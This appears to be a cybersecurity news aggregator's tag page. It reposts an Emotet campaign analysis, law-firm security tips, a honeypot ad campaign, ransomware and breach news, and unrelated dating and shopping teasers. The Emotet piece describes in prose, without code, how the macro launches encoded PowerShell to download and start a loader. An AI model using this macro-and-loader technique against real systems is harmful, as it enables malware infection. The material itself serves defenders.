now browsing by tag
The Emotet malware is a very destructive banking Trojan that was first identified in 2014. Over the years it has evolved with new capabilities and functionalities, prompting cybersecurity agencies like the Australian Cyber Security Centre and US-CERT to issue advisories. Emotet malware generally spreads via malicious documents that drop a modular Trojan bot, which is used to download and install additional remote access tools. We wrote a blog post in January 2019 about how the malware had changed tactics, leading to a spike in the number of Emotet malware attacks. In the last week, we have observed a spike in the number of Emotet malware transactions across our customer base. US-CERT has also issued a fresh advisory regarding the recent spate of attacks.
Our research has discovered that the Emotet malware is still very active and continues to be one of the most destructive malware attacks. The malware has evolved through the years, and the actors behind Emotet have used the infected endpoints to build out a formidable botnet that is used to distribute multiple malware families such as Trickbot and Dridex, as well as ransomware such as Ryuk.
After taking a break through the holiday season in 2019, Emotet malware attacks have restarted in 2020, this time targeting the financial services industry. Similar to previous versions, the Emotet malware is only just the initial attack vector used to launch the attack. The attack is initiated with a malicious Microsoft Word document that is designed to be downloaded and opened by the user. Once opened, the malicious macro executes and contact is made with the command-and-control server to initiate the next stage of the attack.
Menlo Security Research analyzed the topics listed below to gain a better understanding of this most recent Emotet malware attack. Data for this analysis was obtained from the Menlo Security Cloud Platform, which supports millions of users across all industries, including financial services, educational institutions, and the military. In addition to analyzing the Emotet document macro and loader, the analysis breaks down the following for this most recent Emotet malware attack spike and shows the distribution of the industries affected.
- Emotet Kill Chain
- Industries targeted
- Distribution of Emotet hosting domains
- Emotet controller IP distribution
Recent news shows that Emotet infections have crippled daily operations in a number of organizations. Emotet usually propagates in bursts, through delivery of malicious documents via mass compromised websites. Each infected host is then used to build out a botnet. The Menlo Security Research team noticed a spike in Emotet malware activity in January 2020. This spike was detected through our cloud isolation platform, which renders email attachments and websites visited from emailed links remotely, eliminating the possibility that malicious documents would reach an end user’s computer.
The spike in activity occurred during January 14–22, affecting customers using our isolation service in the United States, Europe, and Asia. The following chart shows a spike in the number of Emotet document requests from January 14–22, 2020.
The chart above shows a Spike in Emotet Malware Detected
The Emotet Kill Chain
Like other Emotet malware versions, this recent attack also used malicious macros in a Microsoft Word document. The emails were crafted to appear as legitimate banking or financial transactions. Some examples of the subject lines used in this most recent campaign are given below.
The January 2020 campaign appeared to follow the kill chain similar to the attacks observed in late 2019. The initial attack is used only to gain a foothold in the network and establish contact with the command-and-control server. Once in place, additional malware is downloaded and the malware attempts to spread to other computers on the same network.
Emotet Malware Kill Chain
From the above flow, we can divide the Emotet kill chain as follows:
- Hosting of malicious documents via compromised websites.
- Every malicious document has an embedded macro with a list of stage one URLs to try (usually three or four in the list, depending on the sample).
- The Emotet loader establishes a command-and-control channel by selecting a server IP from a list of built-in C2 IP addresses.
Distribution and Infrastructure
Our data shows that the January 2020 campaign targeted financial services companies primarily in the United States. The following charts show the industry/vertical distribution and regions where these requests came from. Other industries and geographies were included in the attack, though to a far lesser degree.
One of the techniques that Emotet malware uses is to distribute itself through other compromised legitimate websites, essentially creating new zero-day attacks. This makes the malware particularly difficult to protect against since the source of the malware is constantly changing. The following chart categorizes the distribution of the initial delivery URLs that served the malicious documents. The data shows very clearly why Emotet malware continues to evade security defenses and wreak havoc: 76 percent of the URLs used to distribute Emotet malware are actually categorized as safe by the leading threat intelligence databases. Some of the compromised websites were from academic institutions. This means that security products would not block or prohibit users from accessing and downloading content from these sites. Fortunately, Menlo Security customers were fully protected, because these malicious sites would have been viewed in isolation—completely protecting the end user.
Malicious Document Macro
Once the embedded macro inside the document is enabled, it spawns PowerShell to try a list of URLs to fetch the initial Emotet loader. Some observations of the macro behavior:
- The macro constructs the PowerShell command by decoding data from a user form.
- The PowerShell code is stored as a “Tag” property of a frame in the user form, and this frame is used to mask the other elements in the user form.
- The PowerShell code that finally gets executed is Base64 encoded, which tries to download the Emotet loader by trying a list of URLs.
- Uses Net.WebClient.DownloadFile to download the URL and [Diagnostics.Process]::Start to start the process if the download was successful.
Current Emotet Loader and Controller Infrastructure
Further analysis shows that the January 2020 Emotet malware was a far-reaching campaign that was executed through multiple networks. A concentration of IP addresses occurred in certain countries with global financial centers.
The final Emotet bot that gets dropped is usually a modular Trojan that establishes a command-and-control channel by choosing an IP from a list of IP addresses in its config file. The Emotet loader is very well researched and documented, so we will not get into the inner workings of this bot here. Some of the variations we observed:
- We noticed that the initial dropper copies itself to “SysWOW64” and is invoked with a parameter that looks like a random number (–94737736).
- Other characteristics exhibited were typical of a standard Emotet loader:
- Extract system information, enumerate running processes (CreateToolhelp32Snapshot), bundle it using protobuf, and encrypt using an AES key (which is secured with an embedded RSA public key).
- The encrypted POST request to the C2 IP seems to use a randomly generated string param that is form-urlencoded, which seems to be a slight change from previous payload URL patterns.
- In some of the controller IPs, we observed HTTP traffic being sent over port 443.
- A sample encrypted C2 payload is shown below:
The Emotet malware has built a formidable infrastructure over time and can be destructive to an organization if not mitigated in a timely manner. Its techniques of leveraging multistage attacks and distributing malicious code through legitimate websites make the Emotet malware particularly hard to prevent with traditional security products that rely on signatures or threat intelligence.
To protect against Emotet malware attacks, enterprises should:
- Be wary of macro-enabled, untrusted Office documents.
- Vet PowerShell execution policies for Windows users in an organization.
For threat response teams: Keep a close watch on the techniques used by the Emotet actors; https://attack.mitre.org/software/S0367/ has a specific ATT&CK framework page for Emotet.
Contact Menlo Security today to learn more about the Menlo Security Secure Internet with an Isolation Core.
The post #cybersecurity | #hackerspace |<p> Emotet attacks— a spike to start the year… <p> appeared first on National Cyber Security.
View full post on National Cyber Security
Love it or hate it, there’s no denying the unstoppable force of Black Friday. What started off as a tradition across the pond has now become the highlight of every British bargain-hunter’s calendar.
Whether you’re brave enough to flock to Oxford Street or prefer to shop online from the comfort of your own bed, there are serious savings to be had. Laptops, games consoles and clothes are all sold at a fraction of the price – perfect if you want to do some early Christmas shopping.
Because this event only comes around once a year, you need to be as prepared as possible – ideally, knowing exactly what you’re looking to buy. To help you prepare for your guilt-free shopping spree, therefore, we have created a guide of everything you need to know about Black Friday – including the start date, how to find the best deals, how to be safe when shopping online, and predictions of this year’s big-sellers.
What is Black Friday?
Black Friday is a tradition that originates from America, where retailers cut prices on a huge range of items the day after Thanksgiving. However, in recent years Britain has also jumped on the bandwagon.
As such, you can expect major UK retailers to cut prices on a large selection of items – including big-budget electrical items, beauty gift sets, kitchen equipment and clothes.
The post #cyberfraud | #cybercriminals | What date do the sales start and how to find the best offers? appeared first on National Cyber Security.
View full post on National Cyber Security
Oct. 2, 2019 – October is National Cybersecurity Awareness Month, so it’s a good time for law firms to revisit their cybersecurity practices to determine if they have the necessary defenses in place. But legal technology experts say law firms are behind.
Attorneys Dennis Kennedy and Tom Mighell recently discussed law firm cybersecurity on their podcast, the Kennedy-Mighell Report. Despite constant news about data breaches and law firms as targets, many solo and small firms still don’t do enough.
Mighell said he has spoken to many lawyers who don’t upgrade their systems and keep running programs that are unsupported, such as the Microsoft Windows 7 operating system. But unsupported programs are unlocked doors for lurking data thieves.
“Part of the problem is there continues to be brand new ways that bad people can get to us, and keeping up with it all is overwhelming,” said Mighell, chair of the American Bar Association’s Law Practice Management Section.
Christopher Shattuck, who manages the State Bar of Wisconsin’s Law Practice Assistance Program (Practice 411), says cybersecurity is a practice management issue that Wisconsin lawyers must address since ethics rules (SCR 20:1.1, Comment 8) require lawyers to “keep abreast of changes in the law and its practice, including the benefits and risks associated with relevant technology.”
“Many calls that come through the Practice 411 program are related to cybersecurity and what firms should be doing,” Shattuck said. “The solutions will vary by practice, but we can help lawyers and law firms develop plans that are most appropriate for them.”
Keep the Doors Locked
Implementing security protocols doesn’t have to be overwhelming. Consider simple steps like upgrading outdated programs or devices, using strong passwords, and embracing two-factor authentication, which would have prevented the following breach:
org jforward wisbar Joe Forward, Saint Louis Univ. School of Law 2010, is a legal writer for the State Bar of Wisconsin, Madison. He can be reached by org jforward wisbar email or by phone at (608) 250-6161.
A small firm is using Office 365, a cloud-based subscription service that provides a suite of applications for individuals and businesses, such as Word, Excel and Outlook. There are built-in security systems that can help law firms stay secure, but what happens?
Hackers are able to access a user’s Office 365 account because the user’s password is very weak. Then the hackers send emails, impersonating the user (the payroll manager), and gets two payroll checks diverted to a different bank. That money is gone.
“There were two opportunities to stop that hacker dead in its tracks,” Mighell said. “The first would be to set a strong password that would be much more difficult to break.”
According to one cybersecurity expert, an eight-character password can take minutes to crack, whereas a 20-character passwords can take months. Secure password managers can help law firms and lawyers maintain longer, unique passwords.
“Even if the password could have been broken, two-factor authentication would have stopped it. If it’s done right, it’s 99 percent effective,” Mighell said.
With two-factor identification, a user who logs into an online program could choose to receive a text with a numeric code that is required for login. Applications like Authy provides a two-factor identification solution to protect online accounts.
Don’t Use Outdated Software
One of the biggest cybersecurity problems is running outdated systems. When operating systems and programs reach “end-of-life,” they are no longer supported by developers. That includes an end to security updates and patches.
A 2016 lawsuit against a Chicago-based law firm illustrates the potential harm that can occur if law firms use outdated programs. A client sued the firm for running outdated programs that allowed attorneys to remotely access the firm’s network via the internet, including time entry software, a virtual network system, and the firm’s email system.
For instance, attorneys could access a time-tracking program with a user name and password. But the client-plaintiff alleged the law firm “improperly configured the service and left it running out of date software” that was more than a decade old.
The client-plaintiff also alleged the firm’s virtual private network (VPN), which allowed attorneys to access the firm’s files and documents off-site, was not implemented properly and left the whole network open to “Man in the Middle” attacks.
Such attacks allow hackers to eavesdrop on communications and steal confidential information, especially when the faulty VPN, supporting insecure renegotiation, is accessed on public connections at conference centers, cafes, or other public networks.
The client’s lawsuit, which ultimately entered arbitration under the firm’s engagement letter, alleged breach of contract and fiduciary duty, and negligent legal malpractice.
Law firms don’t have to go it alone. Solo and smaller firms that don’t have in-house technical expertise can outsource IT services to Managed Service Providers (MSPs). Given the ethical duty to protect client data, this may be a necessary expense.
According to an article by the Florida Justice Technology Center, using MSPs “is an incredibly effective method of preventing cybersecurity breaches as the IT systems are managed by a third-party who are experts in securing systems. The MSP is contractually obliged to patch the operating systems, patch the applications, and update the firmware and microcode on the associated hardware,” the article states.
Cybersecurity experts Sharon Nelson and John Simek of Sensei Enterprises recently addressed common cybersecurity questions in the June 2019 Wisconsin Lawyer. The article highlights simple things law firms can do to shore up their law firm security.
Do a Security Assessment. “The assessment is usually done using software tools and involves a thorough review of your network. The result is generally a report identifying critical, medium-level, and low-level vulnerabilities. A security assessment tends to come with a proposal for (at least) remediating the critical vulnerabilities along with the estimated cost. We believe it is wise to do these assessments, using a certified third-party cybersecurity company, annually.”
Train Employees. “There is no getting around the absolute need for annual employee cybersecurity training. It is generally somewhat inexpensive and covers the basics of current threats and how to avoid such things as clicking on suspicious links and attachments, going to sketchy websites, giving information over the phone (duped by social engineering), and many other easy-to-make mistakes. A solid hour of good training each year is a small price to pay for educating your employees and creating a culture of cybersecurity.”
Use Password Managers. “Beyond a doubt, the most important security tip is do notreuse passwords! The bad guys are now using computer bots to force attacks using passwords revealed from past data breaches. If you continue to reuse passwords, there is a high probability that the password will be used against other systems. This is another great reason to use password managers; doing so makes it easier to have unique passwords for every system.”
Move Law Firm Data to the Cloud. “Virtually all cybersecurity experts now agree that the cloud will protect your data better than you will. Is the cloud absolutely secure? Of course not. But do law firms, especially solo practices and small firms, tend to be woefully insecure? Yes, they do.”
Try to Keep Up with Technology. Resources such as Attorney at Work, Bob Ambrogi’s LawSites blog, and of course, Wisconsin Lawyer, help attorneys stay on top of new developments in the areas of technology and cybersecurity. “Don’t forget continuing legal education – and ask your colleagues for recommendations regarding speakers who both inform and entertain,” Nelson and Simek wrote.” The 2019 Wisconsin Solo and Small Firm Conference has an entire tracks of CLE programming dedicated to technology and practice management, including cybersecurity.
Don’t Click on Suspicious Links in Emails. A common cybersecurity threat involves “phishing,” where third parties will impersonate someone in your network with genuine-looking emails that contain links to unleash malware or other viruses. Examine emails carefully before clicking on links or call the purported sender to confirm.
You Might Also Be Interested In …
The post #nationalcybersecuritymonth | Law Firm Cyber Security: Start Simple: appeared first on National Cyber Security.
View full post on National Cyber Security
Source: National Cyber Security News
The campaign, sponsored by an insurance company, intends to demonstrate how often hacking attempts are made on a typical small business site.
A variety of recent campaigns have employed digital billboards to show imagery in response to data from weather, traffic conditions, social posts from passersby and commute times.
Today, a new week-long campaign launches in the UK: Dozens of digital displays will demonstrate the frequency of hacking attempts on a typical small business’s website.
Called the Honeypot Poster by campaign sponsor Hiscox insurance, the displays show dots that demonstrate live hacking attempts on custom, “honeypot” proxy servers of the sort that might host a typical small business website, except there was no virus or firewall protection. The servers hold some data but no personal or sensitive info.
The displays show changing dots inside the words “Cyber Attack,” with each dot representing a hacking attempt and a numerical counter showing the daily attacks thus far. During the trial period for the campaign, the hacking attempts averaged 23,000 daily, sometimes peaking as high as 60,000, from Russia, Vietnam, the UK and elsewhere around the world.
The point, Hiscox Head of Marketing and Partnerships Olivia Hendrick said in a statement, is to make “small businesses more aware of the very real threat that cybercrime poses and challenging the belief that cyber criminals only target larger organisations.
View full post on National Cyber Security Ventures
The worldwide “ransomware” cyberattack spread to thousands of more computers on Monday as people logged in at work, disrupting business, schools, hospitals and daily life, though no new large-scale breakdowns were reported. In Britain, whose health service was among the first high-profile targets of the attack Friday, some hospitals and doctors’ offices were still struggling to recover. The full extent …
The post Monday morning blues as ‘WannaCry’ hits at workweek’s start appeared first on National Cyber Security Ventures.
View full post on National Cyber Security Ventures
Have you been single for a long time? Do you want to get back into the exciting world of finally finding that special someone? Here are our tips! Sometimes, if you go for long enough without dating, beginning the process again can seem overwhelming. Read More….
The post How to Start Dating Again: 9 Steps to Get Back in the Game appeared first on Dating Scams 101.
View full post on Dating Scams 101
Met someone new, and need advice for when things get sexy? Here are 30 sexting examples to get a head start on texting dirty, and steaming it up. Sexting is an art form, capable of bringing two interested individuals together for the first time, or keeping an established couple passionate about each other. Read More….
The post 30 Hot, Sexting Examples to Start a Naughty Text Marathon appeared first on Dating Scams 101.
View full post on Dating Scams 101
In a Pastebin post entitled “ECA vs. Assad | Part 1,” Zer0Pwn published sample data, along with a SendSpace link to the full databases.
The sample data includes full names, user names, encrypted passwords, e-mail addresses and phone numbers.
The file on SendSpace includes more than 60,000 full names, user names, phone numbers and home addresses, along with encrypted passwords for Jobs.sy and clear text passwords for RealEstate.sy.
Cyber War News notes that other recent targets of the European Cyber Army have included syrianmonster.com, syria-courts.com, sana.sy, moj.gov.sy, and banquecentrale.gov.sy.
Syria needs to work hardest on their websites security when they are already warned.
View full post on Am I Hacker Proof
The gang, who have dubbed themselves ‘CYBER JIHADIS’ sent a ransom demand after successfully hacking the entire customer data base of the to the communications giant.
The phone and broadband provider said credit card, bank details other personal information were stolen.
TalkTalk said it was “too early to say” how many of its four million UK customers had been affected by the attack.
But today it emerged that already attempts – strangely low-level attempts – had been made to raid customers’ cash.
Discussing the identity of the hackers Adrian Culley, a former detective in the Metropolitan Police’s cyber crime unit, told the BBC Radio 4’s Today Programme:
The post Talk Talk hackers start raids on customers’ bank accounts appeared first on Parent Security Online.
View full post on Parent Security Online